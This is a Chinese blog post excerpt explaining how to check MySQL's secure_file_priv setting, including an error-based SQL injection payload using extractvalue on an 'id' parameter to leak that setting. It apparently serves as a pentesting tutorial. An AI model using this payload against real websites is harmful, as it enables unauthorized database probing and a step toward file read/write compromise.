2021年5月24日
查看mysql是否有文件读写权限,sql注入查询secure_file_priv权限
摘要: show VARIABLES like '%secure%' sql注入中的使用方法 查询secure_file_priv权限 ?id=43 ) and extractvalue(1, concat(0x7e, (select @@global.secure_file_priv),0x7e)) -- 阅读全文
posted @ 2021-05-24 20:02 ggsmdaa 阅读(3899) 评论(0) 推荐(0) 编辑